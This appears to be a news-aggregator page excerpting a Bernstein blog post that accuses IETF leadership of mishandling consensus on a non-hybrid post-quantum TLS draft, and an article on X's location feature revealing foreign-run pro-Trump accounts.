2025.10.04: NSA and IETF: Can an at­tacker sim­ply pur­chase stan­dard­iza­tion of weak­ened cryp­tog­ra­phy? #pqcrypto #hybrids #nsa #ietf #antitrust

2025.09.30: Surreptitious sur­veil­lance: On the im­por­tance of not be­ing seen. #marketing #stealth #nsa

2025.04.23: McEliece stan­dard­iza­tion: Looking at what’s hap­pen­ing, and an­a­lyz­ing ra­tio­nales. #nist #iso #deployment #performance #security

2025.01.18: As ex­pen­sive as a plane flight: Looking at some claims that quan­tum com­put­ers won’t work. #quantum #energy #variables #errors #rsa #secrecy

2024.10.28: The sins of the 90s:

2024.08.03: Clang vs. Clang: You’re mak­ing Clang an­gry. You would­n’t like Clang when it’s an­gry. #compilers #optimization #bugs #timing #security #codescans

2024.06.12: Bibliography keys: It’s as easy as [1], [2], [3]. #bibliographies #citations #bibtex #votemanipulation #paperwriting

2023.11.25: Another way to botch the se­cu­rity analy­sis of Kyber-512:

2023.10.23: Reducing gate” counts for Kyber-512: Two al­go­rithm analy­ses, from first prin­ci­ples, con­tra­dict­ing NISTs cal­cu­la­tion. #xor #popcount #gates #memory #clumping

2023.10.03: The in­abil­ity to count cor­rectly:

2022.08.05: NSA, NIST, and post-quan­tum cryp­tog­ra­phy: Announcing my sec­ond law­suit against the U. S. gov­ern­ment. #nsa #nist #des #dsa #dualec #sigintenablingproject #nistpqc #foia

2022.01.29: Plagiarism as a patent am­pli­fier:

2020.12.06: Optimizing for the wrong met­ric, part 1: Microsoft Word: Review of An Efficiency Comparison of Document Preparation Systems Used in Academic Research and Development” by Knauff and Nejasmic. #latex #word #efficiency #metrics

2019.10.24: Why EdDSA held up bet­ter than ECDSA against Minerva:

2019.04.30: An in­tro­duc­tion to vec­tor­iza­tion: Understanding one of the most im­por­tant changes in the high-speed-soft­ware ecosys­tem. #vectorization #sse #avx #avx512 #antivectors

2017.11.05: Reconstructing ROCA: A case study of how quickly an at­tack can be de­vel­oped from a lim­ited dis­clo­sure. #infineon #roca #rsa

2017.10.17: Quantum al­go­rithms to find col­li­sions: Analysis of sev­eral al­go­rithms for the col­li­sion prob­lem, and for the re­lated multi-tar­get preim­age prob­lem. #collision #preimage #pqcrypto

2017.07.23: Fast-key-erasure ran­dom-num­ber gen­er­a­tors: An ef­fort to clean up sev­eral messes si­mul­ta­ne­ously. #rng #forwardsecrecy #urandom #cascade #hmac #rekeying #proofs

2017.07.19: Benchmarking post-quan­tum cryp­tog­ra­phy: News re­gard­ing the SUPERCOP bench­mark­ing sys­tem, and more rec­om­men­da­tions to NIST. #benchmarking #supercop #nist #pqcrypto

2016.10.30: Some chal­lenges in post-quan­tum stan­dard­iza­tion: My com­ments to NIST on the first draft of their call for sub­mis­sions. #standardization #nist #pqcrypto

2016.06.07: The death of due process: A few notes on tech­nol­ogy-fu­eled nor­mal­iza­tion of lynch mobs tar­get­ing both the ac­cuser and the ac­cused. #ethics #crime #punishment

2016.05.16: Security fraud in Europe’s Quantum Manifesto”: How quan­tum cryp­tog­ra­phers are steal­ing a quar­ter of a bil­lion Euros from the European Commission. #qkd #quantumcrypto #quantummanifesto

2016.03.15: Thomas Jefferson and Apple ver­sus the FBI: Can the gov­ern­ment cen­sor how-to books? What if some of the read­ers are crim­i­nals? What if the books can be un­der­stood by a com­puter? An in­tro­duc­tion to free­dom of speech for soft­ware pub­lish­ers. #censorship #firstamendment #instructions #software #encryption

2015.11.20: Break a dozen se­cret keys, get a mil­lion more for free: Batch at­tacks are of­ten much more cost-ef­fec­tive than sin­gle-tar­get at­tacks. #batching #economics #keysizes #aes #ecc #rsa #dh #logjam

2015.03.14: The death of op­ti­miz­ing com­pil­ers: Abstract of my tu­to­r­ial at ETAPS 2015. #etaps #compilers #cpuevolution #hotspots #optimization #domainspecific #returnofthejedi

2015.02.18: Follow-You Printing: How Equitrac’s mar­ket­ing de­part­ment mis­rep­re­sents and in­ter­feres with your work. #equitrac #followyouprinting #dilbert #officespaceprinter

2014.06.02: The Saber clus­ter: How we built a clus­ter ca­pa­ble of com­put­ing 3000000000000000000000 mul­ti­pli­ca­tions per year for just 50000 EUR. #nvidia #linux #howto

2014.05.17: Some small sug­ges­tions for the Intel in­struc­tion set: Low-cost changes to CPU ar­chi­tec­ture would make cryp­tog­ra­phy much safer and much faster. #constanttimecommitment #vmul53 #vcarry #pipelinedocumentation

2014.04.11: NISTs cryp­to­graphic stan­dard­iza­tion process: The first step to­wards im­prove­ment is to ad­mit pre­vi­ous fail­ures. #standardization #nist #des #dsa #dualec #nsa

2014.03.23: How to de­sign an el­lip­tic-curve sig­na­ture sys­tem: There are many choices of el­lip­tic-curve sig­na­ture sys­tems. The stan­dard choice, ECDSA, is rea­son­able if you don’t care about sim­plic­ity, speed, and se­cu­rity. #signatures #ecc #elgamal #schnorr #ecdsa #eddsa #ed25519

2014.02.05: Entropy Attacks! The con­ven­tional wis­dom says that hash out­puts can’t be con­trolled; the con­ven­tional wis­dom is sim­ply wrong.

Normal prac­tice

in de­ploy­ing post-quan­tum cryp­tog­ra­phy is to de­ploy ECC+PQ. IETFs TLS work­ing group is stan­dard­iz­ing ECC+PQ. But IETF man­age­ment is also non-con­sen­su­ally ram­ming a par­tic­u­lar NSA-driven doc­u­ment through the IETF process, a non-hybrid” doc­u­ment that adds just PQ as an­other TLS op­tion.

Don’t worry: we’re stan­dard­iz­ing cars with seat­belts. Also, rec­og­niz­ing gen­er­ous fund­ing from the National Morgue Association, we’re go­ing to stan­dard­ize cars with­out seat­belts as an­other op­tion, ig­nor­ing the safety ob­jec­tions. That’s okay, right?

Last month I posted

part 1

of this story. Today’s

part 2

high­lighted the cor­rup­tion. This blog post, part 3, high­lights the dodg­ing in a par­tic­u­lar post­ing at the be­gin­ning of this month by an IETF security area di­rec­tor”.

Part 4

will give an ex­am­ple of how dis­sent on this topic has been cen­sored.

Consensus means what­ever the peo­ple in power want to do.

Recall from my pre­vi­ous blog post that adoption” of a doc­u­ment is a pre­lim­i­nary step be­fore an IETF working group” works on, and de­cides whether to stan­dard­ize, the doc­u­ment. In April 2025, the chairs of the IETF TLS WG called for adoption” of this NSA-driven doc­u­ment. During the call pe­riod, 20 peo­ple ex­pressed un­equiv­o­cal sup­port for adop­tion, 2 peo­ple ex­pressed con­di­tional sup­port for adop­tion, and 7 peo­ple ex­pressed un­equiv­o­cal op­po­si­tion to adop­tion. (Details for ver­i­fi­ca­tion.)

The chairs

claimed

that we have con­sen­sus to adopt this draft”. I promptly

asked for ex­pla­na­tion.

Before the chairs could even re­ply, an area di­rec­tor”

in­ter­rupted, claim­ing, in­ter alia, the fol­low­ing: There is clearly con­sen­sus based on the 67 re­sponses to the adop­tion call. … The vast ma­jor­ity was in favour of adop­tion … There were a few dis­sent­ing opin­ions”.

After these lies by the area di­rec­tor” were

de­bunked, the chairs said that they had de­clared con­sen­sus because there is clearly suf­fi­cient in­ter­est to work on this draft” specif­i­cally enough peo­ple will­ing to re­view the draft”.

I can un­der­stand not every­body be­ing fa­mil­iar with the spe­cific de­f­i­n­i­tion of consensus” that

an­titrust law

re­quires stan­dards-de­vel­op­ment or­ga­ni­za­tions to fol­low. But it’s as­ton­ish­ing to see chairs sub­sti­tut­ing a con­sen­sus-eval­u­a­tion pro­ce­dure that sim­ply ig­nores ob­jec­tions.

Stonewalling.

The chairs said I could es­ca­late. IETF pro­ce­dures say that an un­re­solved dis­pute can be brought to the at­ten­tion of the Area Director(s) for the area in which the Working Group is char­tered”, and then The Area Director(s) shall at­tempt to re­solve the dis­pute”.

I filed a com­plaint with the security area di­rec­tors” in early June 2025. One of them never replied. The other, the same one who had claimed that there was clearly con­sen­sus”, sent a se­ries of ex­cuses

for not han­dling the com­plaint. For ex­am­ple, one ex­cuse was that the PDF for­mat discourages par­tic­i­pa­tion”.

Do IETF pro­ce­dures say The Area Director(s) shall at­tempt to re­solve the dis­pute un­less the dis­pute is doc­u­mented in a PDF”? No.

I sent email two days later sys­tem­at­i­cally ad­dress­ing the ex­cuses. The area di­rec­tor” never replied.

It is­n’t clear un­der IETF pro­ce­dures whether a non-re­ply al­lows an ap­peal. It is, how­ever, clear that an ap­peal can’t be filed af­ter two months. I es­ca­lated to the Internet Engineering Steering Group” (IESG) in August 2025.

IESG did­n’t re­ply un­til October 2025. It re­jected one of the Area Director” ex­cuses for hav­ing ig­nored my com­plaint, but en­dorsed an­other ex­cuse. I promptly filed a

re­vised com­plaint

with the area di­rec­tor”, jump­ing through the hoops that IESG had set. There were then fur­ther

runarounds.

The switch.

Suddenly, on 1 November 2025, IESG pub­licly in­structed the area di­rec­tor” to ad­dress the fol­low­ing ques­tion: Was rough con­sen­sus to adopt draft-con­nolly-tls-mlkem-key-agree­ment in the TLS Working Group ap­pro­pri­ately called by the WG chairs?”

The area di­rec­tor” posted his con­clu­sion mere hours later: I agree with the TLS WG Chairs that the Adoption Call re­sult was that there was rough con­sen­sus to adopt the doc­u­ment”.

Dodging pro­ce­dural ob­jec­tions.

Before look­ing at how the area di­rec­tor” ar­gued for this con­clu­sion, I’d like to em­pha­size three things that the area di­rec­tor” did­n’t do.

First, did the area di­rec­tor” ad­dress my com­plaint

about the chair ac­tion on this topic? No.

One rea­son this mat­ters is that the law re­quires stan­dards-de­vel­op­ment or­ga­ni­za­tions to pro­vide an

appeals process”. Structurally, the area di­rec­tor” is­n’t quot­ing and an­swer­ing the points in my com­plaint; the area di­rec­tor” puts the en­tire bur­den on the reader to try to fig­ure out what’s sup­pos­edly an­swer­ing what, and to re­al­ize that many points re­main unan­swered.

Second, did the area di­rec­tor” ad­dress the chairs claim­ing that we have con­sen­sus to adopt this draft”? Or the pre­vi­ous claim from the area di­rec­tor” that there was clearly con­sen­sus”? No. Instead IESG and this area di­rec­tor” qui­etly shifted from consensus” to rough con­sen­sus”. (Did you no­tice this shift when I quoted IESGs rough con­sen­sus” in­struc­tion?)

One rea­son this mat­ters is that

consensus”

is an­other of the le­gal re­quire­ments for stan­dards-de­vel­op­ment or­ga­ni­za­tions. The law does­n’t al­low rough con­sen­sus”. Also, IETF claims that

decision-making re­quires achiev­ing broad con­sen­sus”. broad con­sen­sus” is even stronger than consensus”, since it’s say­ing that there’s con­sen­sus in a broad group.

Third, the way that my com­plaint had es­tab­lished the

lack of con­sen­sus

was, first, by re­view­ing the gen­eral de­f­i­n­i­tion of consensus” (which I para­phrased from the de­f­i­n­i­tion in the law, omit­ting a ci­ta­tion only be­cause the TLS chairs had threat­ened me with a

list ban

if I men­tioned the law again), and then ap­ply­ing the com­po­nents of that de­f­i­n­i­tion to the sit­u­a­tion at hand. Did the area di­rec­tor fol­low this struc­ture? Here’s the de­f­i­n­i­tion of consensus”, or rough con­sen­sus” if we’re switch­ing to that, and now let’s ap­ply that de­f­i­n­i­tion? No. Nobody read­ing this mes­sage from the area di­rec­tor” can fig­ure out what the area di­rec­tor” be­lieves these words mean.

Wow, look at that:

due process”

is an­other of the le­gal re­quire­ments for stan­dards-de­vel­op­ment or­ga­ni­za­tions. Part of due process is sim­ply mak­ing clear what pro­ce­dures are be­ing ap­plied. Could it pos­si­bly be that the peo­ple writ­ing the law were think­ing through how stan­dard­iza­tion processes could be abused?

Numbers.

Without fur­ther ado, let’s look at what the security area di­rec­tor” did write.

The IESG has re­quested that I eval­u­ate the WG Adoption call

re­sults for ML-KEM Post-Quantum Key Agreement for TLS 1.3

(draft-connolly-tls-mlkem-key-agreement). Please see be­low.

As noted above, IESG had in­structed the area di­rec­tor” to an­swer the fol­low­ing ques­tion: Was rough con­sen­sus to adopt draft-con­nolly-tls-mlkem-key-agree­ment in the TLS Working Group ap­pro­pri­ately called by the WG chairs?”

Side note: Given that the area di­rec­tor” posted all of the fol­low­ing on the same day that IESG in­structed the area di­rec­tor” to write this, pre­sum­ably this was all writ­ten in ad­vance and co­or­di­nated with the rest of IESG. I guess the real point of fi­nally (on 1 November 2025) ad­dress­ing the adop­tion de­ci­sion (from 15 April 2025) was to try to pro­vide cover for the last call” a few days later (5 November 2025).

I agree with the TLS WG Chairs that the Adoption Call re­sult was that there was rough con­sen­sus to adopt the doc­u­ment.

As noted above, the TLS WG chairs had claimed consensus”, and the area di­rec­tor” had claimed that there was clearly con­sen­sus”. The area di­rec­tor” is now qui­etly shift­ing to a weaker claim.

...

Read the original on blog.cr.yp.to »

9 297 shares, 13 trendiness

X Just Accidentally Exposed A Vast Covert Influence Network Targeting Americans

A new fea­ture on X has re­vealed that a huge num­ber of large, di­vi­sive po­lit­i­cal ac­counts claim­ing to be Trump sup­port­ers are ac­tu­ally op­er­at­ing out of for­eign coun­tries. The dis­cov­ery — likely the most sweep­ing pub­lic ex­po­sure of covert for­eign ac­tiv­ity on a ma­jor plat­form since the rev­e­la­tions about Russia in 2016 — raises se­ri­ous con­cerns about covert for­eign in­flu­ence in U. S. po­lit­i­cal dis­course, mir­ror­ing the Russian dis­in­for­ma­tion cam­paign in which op­er­a­tives from Russia’s Internet Research Agency posed as U.S. per­sons to in­ter­fere in the elec­tion.

The new fea­ture on X al­lows users to see the ap­prox­i­mate place where an ac­count was cre­ated and is pri­mar­ily op­er­at­ing from, rather than hav­ing to rely solely on an ac­count op­er­a­tor’s self-re­ported lo­ca­tion. The move was made to boost trans­parency and en­hance the au­then­tic­ity of dis­cus­sions on the plat­form, but it im­me­di­ately be­came ap­par­ent that the new fea­ture would have an ad­di­tional ef­fect: ex­pos­ing for­eign ac­counts that are pos­ing as Americans.

On Saturday, X users found scores of pro-Trump and MAGA ac­counts that were try­ing to pass as Americans but were op­er­ated from coun­tries in Europe, Asia, Africa, and else­where. X ac­knowl­edges that some of the op­er­at­ing lo­ca­tions may ac­tu­ally be the lo­ca­tion of a VPN ser­vice rather than the lo­ca­tion of the ac­count owner, but the sheer num­ber of ac­counts op­er­at­ing from out­side of the United States makes it clear that not all of these are sim­ply proxy lo­ca­tions. Furthermore, some of these ac­counts had listed their lo­ca­tions as be­ing within the U. S., and some were op­er­at­ing with user­names such as (@)American de­spite be­ing op­er­ated from over­seas. As X Product Chief Nikita Bier ex­plained, if an ac­count claims to be from a U.S. lo­ca­tion but the data shows it’s based over­seas, that dis­crep­ancy is a red flag sug­gest­ing the ac­count might have an­other agenda.”

While lo­ca­tion-based dis­crep­an­cies were found among all types of ac­counts, the most no­tice­able and largest group of ac­counts re­vealed to be op­er­at­ing from over­seas were those re­port­ing to be Trump fans, many of whom de­scribed them­selves as Patriots” who cham­pion America First” pol­i­tics. For in­stance, a promi­nent ac­count called MAGA NATION (with 392,000+ fol­low­ers) turned out to be post­ing from Eastern Europe, not America. Other ex­am­ples in­clude Dark MAGA (15,000 fol­low­ers, based in Thailand), MAGA Scope” (51,000 fol­low­ers, based in Nigeria), and an America First” ac­count (67,000 fol­low­ers) run from Bangladesh. Other large po­lit­i­cal, crypto, and even pub­lic health in­flu­encer ac­counts claim­ing U. S. roots — many of which are also MAGA-aligned — are sim­i­larly be­ing outed with lo­ca­tions traced to coun­tries like India, Nigeria, and else­where. In each case, an ac­count that gave every im­pres­sion of be­ing an American po­lit­i­cal par­tic­i­pant — com­plain­ing about gas prices or vac­cine man­dates, cheer­ing or mock­ing can­di­dates, re­act­ing to de­bates, and post­ing memes about things like the bor­der or in­fla­tion — was run by some­one who is­n’t even in America.

The ex­po­sure of for­eign-run po­lit­i­cal ac­counts on X im­me­di­ately calls to mind covert in­flu­ence op­er­a­tions of the past — most no­tably, Russia’s med­dling in the 2016 U. S. elec­tion. In 2016, Russia’s Internet Research Agency (IRA) in­fa­mously cre­ated count­less fake so­cial me­dia per­sonas im­per­son­at­ing Americans to sow dis­cord and den­i­grate Hillary Clinton/boost Trump’s can­di­dacy. According to the Mueller in­ves­ti­ga­tion’s con­clu­sions and U.S. in­tel­li­gence find­ings, these op­er­a­tives posed as U.S. per­sons…op­er­ated so­cial me­dia pages and groups de­signed to at­tract U.S. au­di­ences…[and] falsely claimed to be con­trolled by U.S. ac­tivists when, in fact, they were con­trolled by [foreign ac­tors].” Their strat­egy in­cluded us­ing stolen iden­ti­ties and pre­tend­ing to be grass­roots American voices, all to in­fil­trate on­line com­mu­ni­ties and in­flu­ence po­lit­i­cal opin­ion. By mid-2016 the IRAs cam­paign ex­plic­itly fo­cused on boost­ing Trump and dis­parag­ing Hillary Clinton, un­der or­ders from the Kremlin.

The pat­tern now emerg­ing on X sug­gests his­tory may be re­peat­ing it­self, al­beit likely with new ac­tors and tech­nolo­gies. Or per­haps even more likely, these types of tac­tics never ac­tu­ally stopped in the first place. Covert for­eign in­flu­ence via so­cial me­dia re­mained a live threat in the run-up to the 2024 pres­i­den­tial elec­tion. In fact, in­ves­tiga­tive re­port­ing by CNN in 2024 un­cov­ered a cam­paign on X aimed at bol­ster­ing Trump’s can­di­dacy — a net­work of at least 60 fake pro-Trump ac­counts us­ing pro­file pho­tos stolen from real women in Europe. These fake per­sonas, pos­ing as en­thu­si­as­tic American Trump sup­port­ers, told U. S. vot­ers to vote for Trump in 2024” while the ac­tual women de­picted (from coun­tries like Denmark, the Netherlands, and even Russia) had no idea their im­ages were be­ing mis­used.

The ge­o­graphic spread of the ex­posed ac­counts hints at a va­ri­ety of pos­si­ble cul­prits and mo­tives. Some ac­counts orig­i­nate in coun­tries his­tor­i­cally linked to dis­in­for­ma­tion tar­get­ing the U. S. (e.g. Russia or Eastern European lo­cales) while oth­ers come from places like Nigeria, India, Thailand, or Kenya with no ob­vi­ous state spon­sor. This sug­gests we could be see­ing mul­ti­ple lay­ers of for­eign in­flu­ence: both state-spon­sored in­flu­ence op­er­a­tions (Russia and oth­ers) try­ing to sway U.S. pol­i­tics, as well as a cot­tage in­dus­try of op­por­tunists and trolls for hire glob­ally who ex­ploit U.S. po­lit­i­cal trib­al­ism for clout or profit. In 2016, for ex­am­ple, not only did Russian agents in­ter­fere, but so did in­de­pen­dent for­eign scam­mers — no­tably the no­to­ri­ous Macedonian fake news farms” where teenagers churned out pro-Trump dis­in­for­ma­tion sim­ply be­cause it drew huge web traf­fic and ad rev­enue. Today’s for­eign MAGA ac­counts could like­wise be profit-dri­ven grifters — peo­ple pre­tend­ing to be pa­tri­otic Americans while ac­tu­ally just rack­ing up fol­low­ers and per­haps so­lic­it­ing do­na­tions or earn­ing X’s ad-share pay­outs from vi­ral con­tent.

The dis­cov­ery that a sig­nif­i­cant num­ber of po­lit­i­cal ac­counts — es­pe­cially in the pro-Trump/​MAGA sphere — are op­er­ated from abroad car­ries far-reach­ing im­pli­ca­tions. It val­i­dates warn­ings that covert for­eign in­flu­ence on so­cial me­dia did not end with 2016, but is an on­go­ing chal­lenge to U. S. democ­racy and so­ci­etal co­he­sion. The im­me­di­ate im­pact is a jolt of aware­ness: both the pub­lic and pol­i­cy­mak­ers can now see con­crete ex­am­ples of how out­siders try to shape American po­lit­i­cal con­ver­sa­tions from afar. This aware­ness, thanks to X’s trans­parency fea­ture, is a dou­ble-edged sword. On the one hand, it em­pow­ers users and au­thor­i­ties to iden­tify and pos­si­bly neu­tral­ize for­eign pro­pa­ganda by call­ing it out and re­mov­ing its mask of au­then­tic­ity. On the other hand, it in­jects a new layer of skep­ti­cism and ac­cu­sa­tion into po­lit­i­cal dis­course — peo­ple may re­flex­ively dis­miss op­pos­ing views as just for­eign bots,” and gen­uine ac­tivists might find them­selves un­der sus­pi­cion if their lo­ca­tion is­n’t eas­ily ver­i­fied.

Moving for­ward, we’ll likely see a re-ex­am­i­na­tion of how much cre­dence we give to so­cial me­dia as a barom­e­ter of pub­lic opin­ion. Lawmakers, cam­paign­ers, and jour­nal­ists will need to vet on­line trends more care­fully (e.g. check if a trend­ing po­lit­i­cal hash­tag is heav­ily dri­ven by ac­counts from over­seas). The plat­form im­pli­ca­tions for X are sig­nif­i­cant as well: X must de­cide whether it will ac­tively clamp down on these for­eign-run ac­counts or sim­ply in­form users and leave the con­tent up. Its rep­u­ta­tion as a plat­form for healthy po­lit­i­cal di­a­logue is on the line; too much ma­nip­u­la­tion could drive users to al­ter­na­tives or in­vite reg­u­la­tory back­lash.

As for the rest of us, the im­pli­ca­tions are sim­i­lar to those fol­low­ing the 2016 Russian cam­paign: we’re still un­der at­tack and likely have been this whole time.

I’ll re­turn with a more de­tailed analy­sis of these rev­e­la­tions soon, so stay tuned.

...

Read the original on weaponizedspaces.substack.com »

10 276 shares, 9 trendiness

GrapheneOS Mastodon

If you trust this link, click it to con­tinue.

...

Read the original on goingdark.social »

To add this web app to your iOS home screen tap the share button and select "Add to the Home Screen".

10HN is also available as an iOS App

If you visit 10HN only rarely, check out the the best articles from the past week.

If you like 10HN please leave feedback and share

Visit pancik.com for more.